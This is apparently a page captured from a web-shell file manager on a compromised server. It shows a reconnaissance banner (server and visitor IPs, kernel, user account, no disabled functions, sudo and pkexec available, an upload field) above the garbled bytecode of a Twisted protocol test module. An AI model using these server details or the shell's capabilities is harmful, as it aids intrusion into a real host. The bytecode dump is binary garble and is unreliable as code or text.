| Server IP : 195.114.193.97 / Your IP : 216.73.217.93 Web Server : LiteSpeed System : Linux host 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64 User : sembi4241 ( 1126) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /lib/python3/dist-packages/twisted/test/__pycache__/ |
Upload File : |
o
�b� � @ s� d Z ddlmZmZmZmZ ddlmZmZ ddl m
Z
ddlmZ ddl
mZ G dd� dej�ZG d d
� d
ej�ZG dd� dej�ZG d
d� dej�ZG dd� dej�ZdS )z+
Test cases for twisted.protocols package.
� )�address�defer�protocol�reactor)�portforward�wire)� iterbytes)�
proto_helpers)�unittestc @ �0 e Zd ZdZdd� Zdd� Zdd� Zdd � Zd
S )� WireTestsz
Test wire protocols.
c C �` t �� }t�� }|�|� |�d� |�d� |�d� |�d� |�d� | �|�� d� dS )zT
Test wire.Echo protocol: send some data and check it send it back.
� hello� world� how� are� yous helloworldhowareyouN)r �StringTransportr �Echo�makeConnection�dataReceived�assertEqual�value��self�t�a� r �=/usr/lib/python3/dist-packages/twisted/test/test_protocols.py� test_echo �
zWireTests.test_echoc C �. t �� }t�� }|�|� | �|�� d� dS )z)
Test wire.Who protocol.
s root
N)r r r �Whor r r r r r r �test_who"